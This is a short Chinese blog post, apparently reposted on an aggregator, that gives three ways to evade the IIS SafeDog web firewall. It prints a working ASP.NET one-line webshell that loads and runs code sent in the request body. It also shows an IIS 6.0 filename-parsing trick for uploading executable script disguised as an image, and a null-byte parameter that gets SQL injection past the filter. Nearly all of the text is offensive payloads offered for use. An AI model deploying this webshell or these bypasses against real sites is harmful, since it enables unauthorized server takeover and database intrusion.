1、繞過IIS安全狗的一句話。
?前幾天測試一個網站。找到突破口之后，寫入webshell，但服務器上裝有IIS安全狗，平時常用的一句話或者shell都用不了。下面這段.net一句話可以突破。
?<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>連接端用cncert的aspx一句話客戶端。
?

2、IIS6.0解析漏洞遇到安全狗。
?文件名為http://www.web.com/sh3llc0de.asp;1.jpg。
?這樣的會被IIS安全狗果斷屏蔽。
?改成如下名稱,IIS6一樣會解析：
?www.web.com/;1.asp;1.jpg
?

3、安全狗的注入繞過。
?常用的如r00ts.asp?id=1 and 1=1 是會被安全狗屏蔽的。
?但如果：
?r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
?就可以成功繞過了。?
?

轉載于:https://blog.51cto.com/findyyy/1017826

總結

以上是生活随笔為你收集整理的突破安全狗防注入及上传的一些思路的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。